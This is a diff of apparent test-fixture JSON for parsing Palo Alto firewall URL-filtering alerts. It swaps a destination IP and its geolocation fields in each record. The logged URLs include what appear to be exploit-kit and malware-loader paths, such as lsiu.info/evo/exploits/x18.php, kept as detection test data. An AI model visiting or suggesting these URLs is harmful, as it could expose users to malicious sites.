@@ -309,19 +297,15 @@ "client.ip": "192.168.0.2", "client.port": 59315, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -332,7 +316,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -344,9 +328,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 1223, + "log.offset": 1217, "network.application": "web-browsing", - "network.community_id": "1:ghLw4NDj0JmAhH9lVtlhdQpqEQ0=", + "network.community_id": "1:ymK/qi8Fj5E3NiB4Zt+MtiJFOHI=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -381,13 +365,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -411,19 +395,15 @@ "client.ip": "192.168.0.2", "client.port": 59316, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -434,7 +414,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -446,9 +426,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 1633, + "log.offset": 1625, "network.application": "web-browsing", - "network.community_id": "1:aiB5YppFUGX0pM/1Xtp3qOSFXJw=", + "network.community_id": "1:R89M2kJolrp3Qf6IPm++vTcewQU=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -483,13 +463,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -513,19 +493,15 @@ "client.ip": "192.168.0.2", "client.port": 59317, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -536,7 +512,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -548,9 +524,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 2076, + "log.offset": 2066, "network.application": "web-browsing", - "network.community_id": "1:GOqfpUTezPkpm6axBI22kY90kU4=", + "network.community_id": "1:fmI3tKXdcqsY5PoHvFSPPOmDSOc=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -585,13 +561,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -615,19 +591,15 @@ "client.ip": "192.168.0.2", "client.port": 59302, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -638,7 +610,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -650,9 +622,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 2519, + "log.offset": 2507, "network.application": "web-browsing", - "network.community_id": "1:22ouAyA1O0KgUQOEKP20E7gNa2U=", + "network.community_id": "1:vAUMECfwOw0ZMjDh547rBQbLCC0=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -687,13 +659,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -716,19 +688,15 @@ "client.ip": "192.168.0.2", "client.port": 59301, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -739,7 +707,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -751,9 +719,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 2931, + "log.offset": 2917, "network.application": "web-browsing", - "network.community_id": "1:phQpgsVhj3YxNYzeNkqdzDgcMCg=", + "network.community_id": "1:NUjNq/OVSu47ikA9lKKSraDM5HU=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -788,13 +756,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -817,19 +785,15 @@ "client.ip": "192.168.0.2", "client.port": 59303, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -840,7 +804,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -852,9 +816,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 3344, + "log.offset": 3328, "network.application": "web-browsing", - "network.community_id": "1:6kV576B7jMsBLC62npA6Dgi/zMI=", + "network.community_id": "1:zikh1dISky6Bvrt3EQgtSiB7tFM=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -889,13 +853,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -918,19 +882,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59304,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -941,7 +901,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -953,9 +913,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 3753,
+ "log.offset": 3735,
 "network.application": "web-browsing",
- "network.community_id": "1:h+XKHvMK2Oz7QQvaJdhsJWE2c9E=",
+ "network.community_id": "1:JJMt5TnGAbJ3hOj5OyWJMZSrCkI=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -990,13 +950,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -1020,19 +980,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59297,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -1043,7 +999,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -1055,9 +1011,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 4217,
+ "log.offset": 4197,
 "network.application": "web-browsing",
- "network.community_id": "1:Sa+u435/AIAAeEelFduJmiGLOv0=",
+ "network.community_id": "1:rIUUZipsjZe9D+20GocGgeotUX8=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -1092,13 +1048,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -1120,19 +1076,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59299,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -1143,7 +1095,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -1155,9 +1107,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 4623,
+ "log.offset": 4601,
 "network.application": "web-browsing",
- "network.community_id": "1:C9009xCOuCuGvMPT4caMCizoYr0=",
+ "network.community_id": "1:iwp6f2j4DuzqklbsQ3X/ysmCjlM=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -1192,13 +1144,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -1221,19 +1173,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59298,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -1244,7 +1192,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -1256,9 +1204,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 5041,
+ "log.offset": 5017,
 "network.application": "web-browsing",
- "network.community_id": "1:BG6Rk6e+H9jRcZHXqRPFG4iA3uU=",
+ "network.community_id": "1:s7wyS51RPURVN0hpBPCJ/Lberv0=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -1293,13 +1241,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -1323,19 +1271,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59300,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -1346,7 +1290,7 @@
 "event.dataset": "panw.panos",
